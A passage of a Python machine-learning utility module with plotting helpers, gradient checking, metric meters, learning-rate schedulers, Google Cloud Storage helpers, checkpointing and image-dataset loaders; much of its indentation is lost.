A list or array of length N with the labels for the columns.
ax
A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If
not provided, use current axes or create a new one. Optional.
cbar_kw
A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.
cbarlabel
The label for the colorbar. Optional.
**kwargs
All other arguments are forwarded to `imshow`.
"""
import matplotlib.pyplot as plt
if not ax:
ax = plt.gca()
# Plot the heatmap
im = ax.imshow(data, **kwargs)
# Create colorbar
cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)
cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom")
# Show all ticks and label them with the respective list entries.
ax.set_xticks(np.arange(data.shape[1]), labels=col_labels)
ax.set_yticks(np.arange(data.shape[0]), labels=row_labels)
# Let the horizontal axes labeling appear on top.
ax.tick_params(top=True, bottom=False,
labeltop=True, labelbottom=False)
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=-30, ha="right",
rotation_mode="anchor")
# Turn spines off and create white grid.
ax.spines[:].set_visible(False)
ax.set_xticks(np.arange(data.shape[1] + 1) - .5, minor=True)
ax.set_yticks(np.arange(data.shape[0] + 1) - .5, minor=True)
ax.grid(which="minor", color="w", linestyle='-', linewidth=3)
ax.tick_params(which="minor", bottom=False, left=False)
return im, cbar
def annotate_heatmap(im, data=None, **textkw):
"""
A function to annotate a heatmap.
Parameters
----------
im
The AxesImage to be labeled.
data
Data used to annotate. If None, the image's data is used. Optional.
    **textkw
        All other arguments are forwarded to each call to `text` used to create
        the text labels.
"""
if not isinstance(data, (list, np.ndarray)):
data = im.get_array()
# Set default alignment to center, but allow it to be
# overwritten by textkw.
kw = dict(horizontalalignment="center",
verticalalignment="center")
kw.update(textkw)
# Loop over the data and create a `Text` for each "pixel".
# Change the text's color depending on the data.
texts = []
for i in range(len(data)):
for j in range(len(data[0])):
text = im.axes.text(j, i, data[i][j], **kw)
texts.append(text)
return texts
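# Illustrative usage sketch (not part of the original module): build an annotated heatmap
# from a small random matrix. The row/column labels and output path are made up for the example.
def _example_heatmap(img_path: str = "./plots/heatmap.png"):
    import matplotlib.pyplot as plt
    data = np.random.rand(4, 6)
    fig, ax = plt.subplots(dpi=300)
    im, cbar = heatmap(
        data,
        row_labels=[f"row {i}" for i in range(4)],
        col_labels=[f"col {j}" for j in range(6)],
        ax=ax,
        cmap="viridis",
        cbarlabel="value",
    )
    annotate_heatmap(im, data=np.round(data, 2))
    fig.tight_layout()
    fig.savefig(img_path)
    plt.close(fig)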
# Shameless copy from plottools https://pythonhosted.org/plottools/generated/plottools.zoom_axes.html
def zoom_axes(fig, ax, zoom_x, zoom_y, axes_x, axes_y, box=True, box_color='k', box_alpha=0.8, connect=True,
connect_color='k', connect_alpha=0.3, spacing=4, tick_width=20, tick_height=12):
"""
Creates a new axes which zooms in on a part of a given axes.
A box is drawn around the area to be zoomed specified in data coordinates. A
new empty axes is created at the specified location, supplied in data
coordinates. The new axis limits are set so that they match the zoom box.
The zoom box and axis can be connected with two lines, connecting the outer
most corner points while leaving space for the axis ticks.
Parameters
----------
fig : matplotlib figure
the figure in which to create a zoom axis
ax : matplotlib axes
the axis in which to create a zoom axis
zoom_x : list
[min, max] specifying the zooming horizontal area in data
coordinates
zoom_y : list
[min, max] specifying the zooming vertical area in data coordinates
axes_x : list
[min, max] specifying the new axes horizontal location in data
coordinates
axes_y : list
[min, max] specifying the new axes vertical location in data
coordinates
box : bool, optional
specifies whether a box is drawn
box_color : color string or tuple,optional
specifies the box color
box_alpha : number
between 0 and 1, specifies the box alpha
connect : bool, optional
specifies whether the connecting lines are drawn
connect_color : color string or tuple,optional
specifies the connecting lines color
connect_alpha : number
between 0 and 1, specifies the connecting lines alpha
spacing : number
specifies the spacing between the box, axis and the connecting lines
in points
tick_width : number
specifies the width of the tick labels in points to avoid drawing
connecting lines through the tick labels
tick_height : number
specifies the height of the tick labels in points to avoid drawing
connecting lines through the tick labels
Returns
-------
ax_zoom : matplotlib axes
the new axes
Notes
-----
* Axes limits should not be changed after a zoom axes has been added
* :code:`zoom_axes` does not give the expected results when used on a
subfigure
Examples
--------
.. plot::
>>> import matplotlib.pyplot as plt
>>> import numpy as np
>>> import plottools
>>>
>>> fig,ax = plt.subplots()
>>> x = np.linspace(0,1,100)
>>> y = 1-x + 0.02*(2*np.random.random(len(x))-1)
>>> ax.plot(x,y)
>>> ax_zoom = plottools.zoom_axes(fig,ax,[0.1,0.2],[0.8,0.9],[0.6,0.9],[0.6,0.9])
>>> ax_zoom.plot(x,y)
>>> plt.show()
"""
import matplotlib.pyplot as plt
plt.tight_layout()
ax1_p0 = (ax.transData + fig.transFigure.inverted()).transform_point((axes_x[0], axes_y[0]))
ax1_p1 = (ax.transData + fig.transFigure.inverted()).transform_point((axes_x[1], axes_y[1]))
ax1 = plt.axes([ax1_p0[0], ax1_p0[1], ax1_p1[0] - ax1_p0[0], ax1_p1[1] - ax1_p0[1]])
ax1.set_xlim(zoom_x)
ax1.set_ylim(zoom_y)
plt.xticks(fontsize=4)
plt.yticks(fontsize=4)
ax1.tick_params(axis='x', pad=3)
ax1.tick_params(axis='y', pad=2)
if box:
ax.plot([zoom_x[0], zoom_x[1], zoom_x[1], zoom_x[0], zoom_x[0]],
[zoom_y[0], zoom_y[0], zoom_y[1], zoom_y[1], zoom_y[0]], color=box_color, alpha=box_alpha,
linewidth=0.4)
if connect:
# define a box of points of the axes and the zoom
zoom_xx = [zoom_x[0], zoom_x[0], zoom_x[1], zoom_x[1]]
zoom_yy = [zoom_y[0], zoom_y[1], zoom_y[1], zoom_y[0]]
axes_xx = [axes_x[0], axes_x[0], axes_x[1], axes_x[1]]
axes_yy = [axes_y[0], axes_y[1], axes_y[1], axes_y[0]]
# determine which points to connect
if axes_x[1] < zoom_x[1]:
# left
if axes_y[0] > zoom_y[0]:
# top
p1 = 0
p2 = 2
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 1
p2 = 3
else:
# center
p1 = 2
p2 = 3
elif axes_x[0] > zoom_x[0]:
# right
if axes_y[0] > zoom_y[0]:
# top
p1 = 1
p2 = 3
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 0
p2 = 2
else:
# center
p1 = 0
p2 = 1
else:
# center
if axes_y[0] > zoom_y[0]:
# top
p1 = 0
p2 = 3
elif axes_y[1] < zoom_y[1]:
# bottom
p1 = 1
p2 = 2
else:
# center, the axes is over the zoom
p1 = 0
p2 = 0
line1 = ([zoom_xx[p1], axes_xx[p1]], [zoom_yy[p1], axes_yy[p1]])
line2 = ([zoom_xx[p2], axes_xx[p2]], [zoom_yy[p2], axes_yy[p2]])
# estimate the width and height of the ticks
tick_width = (ax.transData.inverted()).transform_point((tick_width, 0))[0] - \
(ax.transData.inverted()).transform_point((0, 0))[0]
tick_height = (ax.transData.inverted()).transform_point((0, tick_height))[1] - \
(ax.transData.inverted()).transform_point((0, 0))[1]
spacing = (ax.transData.inverted()).transform_point((spacing, 0))[0] - \
(ax.transData.inverted()).transform_point((0, 0))[0]
# create fictional boxes around the axes where no lines should be
box_axes_x = [axes_x[0] - tick_width, axes_x[1] + spacing]
box_axes_y = [axes_y[0] - tick_height, axes_y[1] + spacing]
box_zoom_x = [zoom_x[0] - spacing, zoom_x[1] + spacing]
box_zoom_y = [zoom_y[0] - spacing, zoom_y[1] + spacing]
# cut the lines inside the boxes
t = np.linspace(0, 1, 100)
line1_cut = line1
line2_cut = line2
for tt in t:
x = line1[0][0] * (1 - tt) + line1[0][1] * tt
y = line1[1][0] * (1 - tt) + line1[1][1] * tt
if x <= box_zoom_x[0] or x >= box_zoom_x[1] or y <= box_zoom_y[0] or y >= box_zoom_y[1]:
line1_cut[0][0] = x
line1_cut[1][0] = y
break
for tt in t[::-1]:
x = line1[0][0] * (1 - tt) + line1[0][1] * tt
y = line1[1][0] * (1 - tt) + line1[1][1] * tt
if (x <= box_axes_x[0] or x >= box_axes_x[1]) or (y <= box_axes_y[0] or y >= box_axes_y[1]):
line1_cut[0][1] = x
line1_cut[1][1] = y
break
for tt in t:
x = line2[0][0] * (1 - tt) + line2[0][1] * tt
y = line2[1][0] * (1 - tt) + line2[1][1] * tt
if (x <= box_zoom_x[0] or x >= box_zoom_x[1]) or (y <= box_zoom_y[0] or y >= box_zoom_y[1]):
line2_cut[0][0] = x
line2_cut[1][0] = y
break
for tt in t[::-1]:
x = line2[0][0] * (1 - tt) + line2[0][1] * tt
y = line2[1][0] * (1 - tt) + line2[1][1] * tt
if (x <= box_axes_x[0] or x >= box_axes_x[1]) or (y <= box_axes_y[0] or y >= box_axes_y[1]):
line2_cut[0][1] = x
line2_cut[1][1] = y
break
# draw the connecting lines
ax.plot(line1_cut[0], line1_cut[1], color=connect_color, alpha=connect_alpha, linewidth=0.4)
ax.plot(line2_cut[0], line2_cut[1], color=connect_color, alpha=connect_alpha, linewidth=0.4)
return ax1
def make_mp4(img_paths: Sequence[str], out_path: str, fps: int):
"""Make an mp4 video from a list of images with paths specified."""
import cv2 # Don't import unless absolutely necessary!
    if not out_path.endswith(".mp4"):
        raise ValueError("`out_path` must point to an .mp4 file")
frame = cv2.imread(img_paths[0])
cv2.imshow('video', frame)
height, width, channels = frame.shape
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(out_path, fourcc, fps, (width, height))
for img_path in img_paths:
frame = cv2.imread(img_path)
out.write(frame)
cv2.imshow('video', frame)
if (cv2.waitKey(1) & 0xFF) == ord('q'): # Hit `q` to exit
break
out.release()
cv2.destroyAllWindows()
# Gradient checking.
def gradcheck(func: Callable,
inputs: Union[torch.Tensor, Sequence[torch.Tensor]],
modules: Optional[Union[nn.Module, Sequence[nn.Module]]] = (),
eps: float = 1e-6,
atol: float = 1e-5,
rtol: float = 1e-3,
grad_inputs=False,
gradgrad_inputs=False,
grad_params=False,
gradgrad_params=False):
"""Check grad and grad of grad wrt inputs and parameters of Modules.
When `func` is vector-valued, the checks compare autodiff vjp against
finite-difference vjp, where v is a sampled standard normal vector.
This function is aimed to be as self-contained as possible so that it could
be copied/pasted across different projects.
Args:
func (callable): A Python function that takes in a sequence of tensors
(inputs) and a sequence of nn.Module (modules), and outputs a tensor
or a sequence of tensors.
inputs (sequence of Tensors): The input tensors.
modules (sequence of nn.Module): The modules whose parameter gradient
needs to be tested.
eps (float, optional): Magnitude of two-sided finite difference
perturbation.
atol (float, optional): Absolute tolerance.
rtol (float, optional): Relative tolerance.
grad_inputs (bool, optional): Check gradients wrt inputs if True.
gradgrad_inputs (bool, optional): Check gradients of gradients wrt
inputs if True.
grad_params (bool, optional): Check gradients wrt differentiable
parameters of modules if True.
gradgrad_params (bool, optional): Check gradients of gradients wrt
differentiable parameters of modules if True.
Returns:
None.
"""
if isinstance(inputs, torch.Tensor):
inputs = (inputs,)
if isinstance(modules, nn.Module):
modules = (modules,)
# Don't modify original objects.
modules = tuple(copy.deepcopy(m) for m in modules)
inputs = tuple(i.clone().requires_grad_() for i in inputs)
func = _make_scalar_valued_func(func, inputs, modules)
func_only_inputs = lambda *args: func(args, modules) # noqa
# Grad wrt inputs.
if grad_inputs:
torch.autograd.gradcheck(func_only_inputs, inputs, eps=eps, atol=atol, rtol=rtol)
# Grad of grad wrt inputs.
if gradgrad_inputs:
torch.autograd.gradgradcheck(func_only_inputs, inputs, eps=eps, atol=atol, rtol=rtol)
# Grad wrt params.
if grad_params:
params = [p for m in modules for p in m.parameters() if p.requires_grad]
loss = func(inputs, modules)
framework_grad = flatten(convert_none_to_zeros(torch.autograd.grad(loss, params, create_graph=True), params))
numerical_grad = []
for param in params:
flat_param = param.reshape(-1)
for i in range(len(flat_param)):
flat_param[i] += eps # In-place.
plus_eps = func(inputs, modules).detach()
flat_param[i] -= eps
flat_param[i] -= eps
minus_eps = func(inputs, modules).detach()
flat_param[i] += eps
numerical_grad.append((plus_eps - minus_eps) / (2 * eps))
del plus_eps, minus_eps
numerical_grad = torch.stack(numerical_grad)
torch.testing.assert_allclose(numerical_grad, framework_grad, rtol=rtol, atol=atol)
# Grad of grad wrt params.
if gradgrad_params:
def func_high_order(inputs_, modules_):
params_ = [p for m in modules for p in m.parameters() if p.requires_grad]
grads = torch.autograd.grad(func(inputs_, modules_), params_, create_graph=True, allow_unused=True)
return tuple(grad for grad in grads if grad is not None)
gradcheck(func_high_order, inputs, modules, rtol=rtol, atol=atol, eps=eps, grad_params=True)
def _make_scalar_valued_func(func, inputs, modules):
outputs = func(inputs, modules)
output_size = outputs.numel() if torch.is_tensor(outputs) else sum(o.numel() for o in outputs)
if output_size > 1:
# Define this outside `func_scalar_valued` so that random tensors are generated only once.
grad_outputs = tuple(torch.randn_like(o) for o in outputs)
def func_scalar_valued(inputs_, modules_):
outputs_ = func(inputs_, modules_)
return sum((output * grad_output).sum() for output, grad_output, in zip(outputs_, grad_outputs))
return func_scalar_valued
return func
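# Illustrative usage sketch (not part of the original module): check gradients of a small MLP
# wrt both its inputs and its parameters. The architecture is an assumption chosen only to keep
# the example fast; double precision avoids spurious finite-difference tolerance failures.
def _example_gradcheck():
    mlp = nn.Sequential(nn.Linear(3, 5), nn.Tanh(), nn.Linear(5, 1)).double()
    x = torch.randn(4, 3, dtype=torch.float64)

    def func(inputs, modules):
        # `inputs` and `modules` are the (copied) sequences handed back by `gradcheck`.
        (x_,), (mlp_,) = inputs, modules
        return mlp_(x_)

    gradcheck(func, x, modules=mlp, grad_inputs=True, grad_params=True)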
# Meters.
class Meter(abc.ABC):
def __init__(self, init_val: Optional[float] = None, store_history=False):
self._val = init_val
self._his = []
self._store_history = store_history
@abc.abstractmethod
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = to_numpy(x)
if self._store_history:
self._his.append(x)
return x
def item(self) -> float:
return self._val
class EMAMeter(Meter):
"""Standard exponential moving average."""
def __init__(self, gamma: Optional[float] = .99):
super(EMAMeter, self).__init__()
self._gamma = gamma
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(EMAMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._gamma * self._val + (1 - self._gamma) * x
return self._val
class AvgMeter(Meter):
"""Exact online averaging."""
def __init__(self):
super(AvgMeter, self).__init__()
self._count = 0
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(AvgMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._val * self._count / (self._count + 1) + x / (self._count + 1)
self._count += 1
return self._val
class SumMeter(Meter):
def __init__(self):
super(SumMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(SumMeter, self).step(x)
if self._val is None:
self._val = x
else:
self._val = self._val + x
return self._val
class MaxMeter(Meter):
def __init__(self):
super(MaxMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(MaxMeter, self).step(x)
if self._val is None:
self._val = x
elif x > self._val:
self._val = x
return self._val
class MinMeter(Meter):
def __init__(self):
super(MinMeter, self).__init__()
def step(self, x: Union[torch.Tensor, np.ndarray, float]):
x = super(MinMeter, self).step(x)
if self._val is None:
self._val = x
elif x < self._val:
self._val = x
return self._val
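# Illustrative usage sketch (not part of the original module): track a noisy training loss
# with both an exponential moving average and an exact running average.
def _example_meters():
    ema, avg = EMAMeter(gamma=0.9), AvgMeter()
    for step in range(100):
        loss = 1.0 / (step + 1) + np.random.randn() * 0.01  # Made-up loss values.
        ema.step(loss)
        avg.step(loss)
    print(f"ema={ema.item():.4f}, avg={avg.item():.4f}")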
# Custom learning rate schedules.
def get_warmup_exp_decay_scheduler(optimizer: optim.Optimizer,
num_warmup_steps: int,
lr_decay_rate: Optional[float] = .99997,
last_epoch: Optional[int] = -1):
"""Exponential decay schedule with linear warmup."""
def _lr_lambda(current_step):
if current_step < num_warmup_steps:
return float(current_step) / float(max(1, num_warmup_steps))
return lr_decay_rate ** (current_step - num_warmup_steps)
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_warmup_inverse_sqrt_scheduler(optimizer: optim.Optimizer,
d_model: int,
num_warmup_steps: Optional[int] = 4000,
last_epoch: Optional[int] = -1,
factor: Optional[float] = 1.):
"""Inverse square root with linear warmup exactly as in transformers paper.
Args:
optimizer: Optimizer of choice.
d_model: Size of transformer encoding.
num_warmup_steps: Number of steps for linear warmup.
last_epoch: Typical argument for lambda schedules.
factor (float): A scalar factor applied to the default schedule. Defaults to 1., which is the original.
Returns:
A LambdaLR with corresponding schedule.
"""
# Since LambdaLR multiplies the return value of the lambda_lr function with the lr,
# we set lr to be 1.
for param_group in optimizer.param_groups:
if 'lr' in param_group:
param_group['lr'] = 1
num_warmup_steps = max(num_warmup_steps, 1) # To prevent raising zero to a negative power.
def _lr_lambda(current_step):
current_step += 1 # To prevent raising zero to a negative power.
return d_model ** -0.5 * min(current_step ** -0.5, current_step * num_warmup_steps ** -1.5) * factor
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_linear_lr_scheduler(optimizer: optim.Optimizer,
start_lr: float,
end_lr: float,
num_steps: int,
last_epoch: Optional[int] = -1):
"""Simple linear scheduler from start_lr to end_lr.
Becomes constant when current_step is larger than num_steps.
"""
def _lr_lambda(current_step):
return start_lr + (end_lr - start_lr) * (min(current_step, num_steps) / num_steps)
return optim.lr_scheduler.LambdaLR(optimizer, _lr_lambda, last_epoch=last_epoch)
def get_lr(optimizer: optim.Optimizer):
return optimizer.param_groups[0]['lr']
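# Illustrative usage sketch (not part of the original module): the transformer-style
# inverse-sqrt schedule overrides the optimizer's lr with the multiplier it computes, so the
# base lr passed to the optimizer below is irrelevant. The model argument is assumed to exist.
def _example_warmup_scheduler(model: nn.Module):
    optimizer = optim.Adam(model.parameters(), lr=1.0)
    scheduler = get_warmup_inverse_sqrt_scheduler(optimizer, d_model=512, num_warmup_steps=4000)
    for _ in range(10):
        optimizer.step()
        scheduler.step()
    print(f"current lr: {get_lr(optimizer):.2e}")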
# Google cloud storage.
def gs_upload_from_path(local_path, remote_path=None, remove_local=True, timeout=480):
"""Uploads a single file to a remote gs bucket.
Catches the exception and returns `False` if upload failed.
"""
from google.cloud import storage # noqa
success = True
if remote_path is None:
remote_path = local_path
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
try:
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
blob.upload_from_filename(local_path, timeout=timeout)
except MemoryError as memory_error:
raise memory_error # You don't want to catch this!!!
except Exception as e:
logging.warning(f'Failed uploading {local_path} to {remote_path}')
logging.warning(f'Caught exception:\n{e}')
success = False
if remove_local:
os.remove(local_path)
return success
def gs_upload_from_dir(local_directory, remote_directory=None, remove_local=True, timeout=480):
if remote_directory is None:
remote_directory = local_directory
for root, _, files in os.walk(local_directory):
for file in files:
local_path = os.path.join(root, file)
remote_path = remote_directory + local_path[len(local_directory):]
remote_path = str.lstrip(remote_path, '/')
gs_upload_from_path(local_path, remote_path, remove_local=remove_local, timeout=timeout)
def gs_download_from_path(local_path, remote_path=None, timeout=480):
from google.cloud import storage # noqa
success = True
if remote_path is None:
remote_path = local_path
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
local_dir = os.path.dirname(local_path)
os.makedirs(local_dir, exist_ok=True)
try:
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
blob.download_to_filename(local_path, timeout=timeout)
except MemoryError as memory_error:
raise memory_error # You don't want to catch this!!!
except Exception as e:
logging.warning(f'Failed downloading {remote_path} to {local_path}')
logging.warning(f'Caught exception:\n{e}')
success = False
return success
def gs_download_from_dir(remote_dir):
from google.cloud import storage # noqa
remote_dir = remote_dir.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_dir = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blobs = bucket.list_blobs(prefix=bucket_dir)
for blob in blobs:
if blob.name.endswith('/'): # Skip folders.
continue
# blob.name: folder/subfolder/file.
tokens = blob.name.split('/')
# Extract `local_dir` and `local_path`.
local_dir_tokens = [bucket_id] + tokens[:-1]
local_dir = os.path.join(*local_dir_tokens)
local_path_tokens = [bucket_id] + tokens
local_path = os.path.join(*local_path_tokens)
os.makedirs(local_dir, exist_ok=True)
blob.download_to_filename(local_path)
def gs_file_exists(remote_path):
from google.cloud import storage # noqa
remote_dir = remote_path.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_path = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blob = bucket.blob(bucket_path)
return blob.exists()
def gs_listdir(remote_dir, full_path: Optional[bool] = False):
from google.cloud import storage # noqa
remote_dir = remote_dir.replace('gs://', '')
bucket_id = remote_dir.split('/')[0]
bucket_dir = remote_dir[len('{}/'.format(bucket_id)):]
bucket = storage.Client().bucket(bucket_id)
blobs = bucket.list_blobs(prefix=bucket_dir)
if full_path:
return [os.path.join(bucket_id, blob.name) for blob in blobs]
return blobs
# Timer.
class Timer(object):
def __init__(self, msg=None, stream: Optional[Union[str, io.IOBase]] = "stderr", logging=False, level=logging.WARN):
super(Timer, self).__init__()
self.msg = msg
if isinstance(stream, str):
stream = {
"stderr": sys.stderr,
"stdout": sys.stdout
}[stream]
else:
if not isinstance(stream, io.IOBase):
raise ValueError(f"Expected stream of type `io.IOBase`, but found: {type(stream)}")
self.stream = stream # Output stream.
self.logging = logging
self.level = level
def __enter__(self):
self.now = time.perf_counter()
def __exit__(self, exc_type, exc_val, exc_tb):
time_elapse = time.perf_counter() - self.now
msg = f"Time elapse={time_elapse:.6f}"
if self.msg is not None:
msg = f"{self.msg}: " + msg
if self.logging:
logging.log(level=self.level, msg=msg)
else:
print(msg, file=self.stream)
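# Illustrative usage sketch (not part of the original module): time a block of code and report
# the elapsed wall-clock time on stderr (the default stream).
def _example_timer():
    with Timer(msg="matrix multiply"):
        a = torch.randn(512, 512)
        b = torch.randn(512, 512)
        _ = a @ b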
# Disable gc (e.g. for faster pickling).
# https://stackoverflow.com/questions/2766685/how-can-i-speed-up-unpickling-large-objects-if-i-have-plenty-of-ram
class DisableGC(object):
def __init__(self):
super(DisableGC, self).__init__()
def __enter__(self):
gc.disable()
def __exit__(self, exc_type, exc_val, exc_tb):
gc.enable()
# Checkpoint.
def all_ckpts(dir_, sort=True):
# Returns all checkpoint paths in the form of a used-once generator.
file_names = os.listdir(dir_)
file_names = filter(lambda f: f.startswith('global_step_'), file_names)
file_names = filter(lambda f: f.endswith('.ckpt'), file_names)
file_names = map(lambda f: os.path.join(dir_, f), file_names)
if sort: return sort_ckpts(file_names)
return file_names
def sort_ckpts(file_names: Union[map, filter, list]):
# Takes in an iterable (not necessarily a list); returns a list.
if not isinstance(file_names, list):
        if not isinstance(file_names, collections.abc.Iterable):
raise ValueError
file_names = list(file_names)
# Avoid in-place ops that have side-effects.
file_names_copy = file_names.copy()
file_names_copy.sort(key=lambda f: int(''.join(filter(str.isdigit, f))))
return file_names_copy
def latest_ckpt(dir_, prefix="global_step_", suffix=".ckpt", num_digits=6):
# Returns the path towards the latest ckpt. Returns `None` if no ckpt is found.
# Assumes names are of the format `./parent_dir/global_step_i.ckpt`, where i is the index.
# The prefix "global_step_" and suffix ".ckpt" must *both* be present in the path.
def extract_id(name):
assert isinstance(name, str)
assert name.startswith(prefix) and name.endswith(suffix)
name = name[len(prefix):]
name = name[:-len(suffix)]
return int(name)
file_names = os.listdir(dir_)
file_names = filter(lambda f: f.startswith(prefix), file_names)
file_names = filter(lambda f: f.endswith(suffix), file_names)
idx = map(extract_id, file_names)
idx = list(idx)
if len(idx) == 0:
print(f'Did not find any checkpoints in: {dir_}')
return None
latest_path = os.path.join(dir_, f'{prefix}{max(idx):0{num_digits}d}{suffix}')
return latest_path
def save_ckpt(
path: str,
model: nn.Module,
optimizer: Optional[optim.Optimizer] = None,
scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,
additional_state_dicts: Optional[Dict] = None, # Other state_dicts you might want to include.
cloud_storage=False, # cloud_storage is the legacy argument.
to_gcs=False,
):
# model, optimizer, scheduler are special parameters.
os.makedirs(os.path.dirname(path), exist_ok=True)
state_dicts = {
"model": model.state_dict(),
"optimizer": None if optimizer is None else optimizer.state_dict(),
"scheduler": None if scheduler is None else scheduler.state_dict(),
}
if additional_state_dicts is not None:
        for key, value in additional_state_dicts.items():
state_dicts[key] = value
# Save and upload.
torch.save(state_dicts, path)
if cloud_storage or to_gcs:
gs_upload_from_path(path)
def load_ckpt(
path: str,
model: nn.Module,
optimizer: Optional[optim.Optimizer] = None,
scheduler: Optional[optim.lr_scheduler._LRScheduler] = None,
additional_state_objects: Optional[Dict] = None,
verbose=True,
):
if verbose:
logging.warning(f'Loading checkpoint from {path}')
state_dicts = torch.load(path)
model.load_state_dict(state_dicts['model'])
if optimizer is not None:
optimizer.load_state_dict(state_dicts['optimizer'])
if scheduler is not None:
scheduler.load_state_dict(state_dicts['scheduler'])
if additional_state_objects is not None:
        for key, value in additional_state_objects.items():
            value.load_state_dict(state_dicts[key])
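# Illustrative usage sketch (not part of the original module): periodically write checkpoints
# named `global_step_XXXXXX.ckpt` so that `latest_ckpt` can find the most recent one when
# resuming. The directory name and step index are assumptions for the example.
def _example_checkpointing(model: nn.Module, optimizer: optim.Optimizer, train_dir: str = "./train_dir"):
    path = os.path.join(train_dir, "global_step_000100.ckpt")
    save_ckpt(path, model, optimizer=optimizer)
    resume_path = latest_ckpt(train_dir)
    if resume_path is not None:
        load_ckpt(resume_path, model, optimizer=optimizer)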
# Data.
def get_data_stats(data_name):
if data_name == "cifar10":
input_size = (3, 32, 32)
classes = 10
elif data_name == "cifar100":
input_size = (3, 32, 32)
classes = 100
elif data_name in ("mnist", "kmnist", "fmnist"):
input_size = (1, 28, 28)
classes = 10
elif data_name == "svhn":
input_size = (3, 32, 32)
classes = 10
elif data_name in ("imagenet32", "imagenet64", "celebahq", "celeba_5bit"):
input_size = (3, 32, 32)
classes = None
else:
raise ValueError(f"Unknown data: {data_name}")
return {"input_size": input_size, "classes": classes}
def dequantize(x, nvals=256):
"""[0, 1] -> [0, nvals] -> add uniform noise -> [0, 1]"""
noise = x.new().resize_as_(x).uniform_()
x = x * (nvals - 1) + noise
x = x / nvals
return x
def get_loader(data_name,
root=None,
train_batch_size=128,
test_batch_size=1024,
pin_memory=True,
num_workers=8,
train_transform=None,
test_transform=None,
train_target_transform=None,
test_target_transform=None,
drop_last=True,
shuffle=True,
data_aug=True,
padding_mode="constant",
task="density",
**kwargs):
import torchvision as tv
if task not in ("density", "classification", "hybrid"):
raise ValueError(f"Unknown task: {task}. Expected one of `density`, `classification`, `hybrid`.")
logging.warning(f"Creating loaders for data: {data_name}, task: {task}")
if root is None:
root = os.path.join(os.path.expanduser("~"), 'data')
os.makedirs(root, exist_ok=True)
if data_name in ('cifar10', 'cifar100'):
if data_name == 'cifar10':
mean, std = (0.4914, 0.4822, 0.4465), (0.2471, 0.2435, 0.2616)
else:
mean, std = (0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.RandomHorizontalFlip(),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
tv.transforms.Normalize(mean, std)
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if data_name == 'cifar10':
train_data = tv.datasets.CIFAR10(
root, transform=train_transform, target_transform=train_target_transform, train=True, download=True
)
test_data = tv.datasets.CIFAR10(
root, transform=test_transform, target_transform=test_target_transform, train=False, download=True
)
else:
train_data = tv.datasets.CIFAR100(
root, transform=train_transform, target_transform=train_target_transform, train=True, download=True
)
test_data = tv.datasets.CIFAR100(
root, transform=test_transform, target_transform=test_target_transform, train=False, download=True
)
elif data_name == "svhn":
if train_transform is None:
if task in ("classification", "hybrid"):
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.ToTensor(),
])
else:
train_transform = tv.transforms.Compose([tv.transforms.ToTensor()])
else: # `density`.
if data_aug:
train_transform = tv.transforms.Compose([
tv.transforms.RandomCrop(32, padding=4, padding_mode=padding_mode),
tv.transforms.ToTensor(),
dequantize,
])
else:
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize
])
if test_transform is None:
if task in ("classification", "hybrid"):
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
test_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
dequantize,
])
train_data = tv.datasets.SVHN(
root, transform=train_transform, target_transform=train_target_transform, split='train', download=True
)
test_data = tv.datasets.SVHN(
root, transform=test_transform, target_transform=test_target_transform, split='test', download=True
)
elif data_name in ('mnist', 'kmnist', 'fmnist'):
if train_transform is None:
if task in ("classification", "hybrid"):
train_transform = tv.transforms.Compose([
tv.transforms.ToTensor(),
])
else: # `density`.
train_transform = tv.transforms.Compose([
